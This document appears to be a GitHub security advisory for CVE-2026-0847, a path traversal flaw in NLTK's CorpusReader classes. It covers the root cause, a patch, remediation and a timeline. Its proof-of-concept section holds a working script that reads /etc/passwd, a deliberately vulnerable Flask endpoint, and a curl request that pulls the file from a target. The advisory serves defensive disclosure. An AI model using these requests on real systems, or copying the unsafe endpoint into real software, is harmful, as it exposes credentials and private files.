# CVE-2026-0847 — NLTK Multiple CorpusReader Classes: Arbitrary File Read via Path Traversal

--- ## Overview | Field | Details | |---|---| | **CVE ID** | CVE-2026-0847 | | **Package** | `nltk` (Natural Language Toolkit) | | **Registry** | PyPI | | **Affected Versions** | `<= 3.9.2` | | **Vulnerability Type** | CWE-22: Path Traversal | | **CVSS Score** | 8.6 (High) | | **Attack Vector** | Network | | **Attack Complexity** | Low | | **Privileges Required** | None | | **User Interaction** | None | | **Confidentiality Impact** | High | | **Integrity Impact** | Low | | **Availability Impact** | Low | | **Reported On** | December 4, 2025 | | **CVE Published** | March 4, 2026 | | **Supported By** | Palo Alto Networks / Prisma AIRS | | **Status** | Fixed | --- ## Description Multiple `CorpusReader` classes in the NLTK library accept file path arguments without applying any path canonicalization, allowlist validation, or sandbox restrictions. When an attacker controls the corpus filename or file input — a common scenario in machine learning APIs, upload-based NLP pipelines, and chatbot services — they can supply a crafted path to traverse the directory hierarchy and read arbitrary files on the server. This vulnerability is particularly critical in networked deployments where NLTK processes user-controlled file paths, as no authentication or privilege is required to exploit it. --- ## Affected Components | Class | File | Status | |---|---|---| | `WordListCorpusReader` | `wordlist.py` L1–L120 | Vulnerable | | `TaggedCorpusReader` | `tagged.py` L1–L140 | Vulnerable | | `BracketParseCorpusReader` | `bracket_parse.py` L1–L150 | Vulnerable | | Other classes using the same base pattern | — | Pending wider audit | All three classes inherit the same unsafe `CorpusReader.open()` method, which performs no path restriction before resolving and reading the supplied file identifier. --- ## Impact Successful exploitation of this vulnerability can result in: - **Arbitrary file read** — An attacker can read any file accessible to the process running NLTK, including `/etc/passwd`, `/etc/shadow`, and `/var/log/auth.log` - **Credential and secret exposure** — SSH private keys (`~/.ssh/id_rsa`), `.env` files, API tokens, and cloud credential files can be extracted - **Source code and training data disclosure** — Other users' training data or proprietary application source code may be read - **Remote Code Execution (chained)** — When combined with pickle-deserialization vulnerabilities, path traversal can be used to load malicious model files and escalate to full RCE - **Lateral movement** — In microservice environments, extracted secrets have been observed enabling lateral movement and full server compromise --- ## Proof of Concept > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.** ### Local File Read via Direct API ```python # PoC.py — demonstrates arbitrary file read using three vulnerable CorpusReader classes from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader from nltk.corpus.reader.util import FileSystemPathPointer root = FileSystemPathPointer("/") # unrestricted filesystem root target = "etc/passwd" # any sensitive file path print("--- WordListCorpusReader ---") reader1 = WordListCorpusReader(root, [target]) print(reader1.raw(target)[:200]) print("--- TaggedCorpusReader ---") reader2 = TaggedCorpusReader(root, [target]) print(reader2.raw(target)[:200]) print("--- BracketParseCorpusReader ---") reader3 = BracketParseCorpusReader(root, [target]) print(reader3.raw(target)[:200]) ``` **Output (abbreviated):** ``` --- WordListCorpusReader --- root:x:0:0:root:/root:/usr/bin/zsh --- TaggedCorpusReader --- root:x:0:0:root:/root:/usr/bin/zsh --- BracketParseCorpusReader --- root:x:0:0:root:/root:/usr/bin/zsh ``` ### Remote Exploit Scenario — Vulnerable Flask API A realistic scenario where NLTK is exposed via an HTTP API: ```python # Vulnerable API server from flask import Flask, request from nltk.corpus.reader import WordListCorpusReader from nltk.corpus.reader.util import FileSystemPathPointer app = Flask(__name__) root = FileSystemPathPointer("/") @app.post("/read") def read_file(): filename = request.json.get("file") reader = WordListCorpusReader(root, [filename]) return reader.raw(filename) app.run("0.0.0.0", 8000) ``` **Attacker request:** ```bash curl -X POST http://TARGET:8000/read \ -H "Content-Type: application/json" \ -d '{"file": "etc/passwd"}' ``` **Result:** Full contents of `/etc/passwd` returned to the attacker with no authentication required. --- ## Root Cause The vulnerability originates in `CorpusReader.open()`. The method resolves the supplied `fileid` directly against the configured root path using `FileSystemPathPointer.join()` without performing any of the following checks: - Absolute path rejection - Parent directory traversal (`..`) detection - Path normalization and comparison to enforce confinement within the corpus root Because `FileSystemPathPointer` can be initialized with `/`, an attacker who controls the filename argument has unrestricted read access to the entire filesystem. --- ## Suggested Patch Minimal fix proposed by the researcher, to be applied inside `CorpusReader.open()`: ```python import os normalized = fileid.replace("\\", "/") # Block absolute paths if os.path.isabs(normalized): raise ValueError("Absolute paths are not permitted.") # Block directory traversal sequences if ".." in normalized.split("/"): raise ValueError("Path traversal sequences are not permitted.") # Enforce confinement within corpus root joined = self._root.join(normalized) if not os.path.normpath(joined._path).startswith( os.path.normpath(self._root._path) ): raise ValueError("Path escapes the corpus root directory.") ``` The upstream fix PR is available at: [https://github.com/nltk/nltk/pull/3479](https://github.com/nltk/nltk/pull/3479) --- ## Remediation | Action | Details | |---|---| | **Upgrade NLTK** | Update to a version greater than 3.9.2 once an official patch is released | | **Input Validation** | Sanitize and validate all user-supplied file path values before passing them to any NLTK `CorpusReader` class | | **Avoid User-Controlled Paths** | Do not allow user input to directly or indirectly control the `fileids` argument of any `CorpusReader` | | **Least Privilege** | Run NLTK-based services under a restricted OS user account with read access limited to the corpus directory only | | **Containerization** | Isolate the service in a Docker container or chroot jail to limit the blast radius of a successful traversal | | **Ubuntu Patch** | Monitor the [Ubuntu Security Advisory](https://ubuntu.com/security/CVE-2026-0847) for distribution-level package updates | **Upgrade via pip:** ```bash pip install --upgrade nltk ``` **Verify installed version:** ```bash python -c "import nltk; print(nltk.__version__)" ``` --- ## Timeline | Date | Event | |---|---| | December 4, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 | | December 2025 | NLTK maintainer team notified via huntr.dev | | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded to researcher | | January 2026 | CVE-2026-0847 assigned | | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers | | March 4, 2026 | CVE published on NVD and huntr.dev | | March 5, 2026 | NVD record last modified | --- ## References | Resource | Link | |---|---| | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0847 | | Ubuntu Security Advisory | https://ubuntu.com/security/CVE-2026-0847 | | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0847 | | huntr.dev Report | https://huntr.dev | | Fix Pull Request | https://github.com/nltk/nltk/pull/3479 | | NLTK on PyPI | https://pypi.org/project/nltk/ | | OWASP Path Traversal | https://owasp.org/www-community/attacks/Path_Traversal | | CWE-22 | https://cwe.mitre.org/data/definitions/22.html | --- ## Disclaimer This repository documents CVE-2026-0847 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability. Any use of this information to access systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein. Contributors [@mohitf070304](https://github.com/mohitf070304)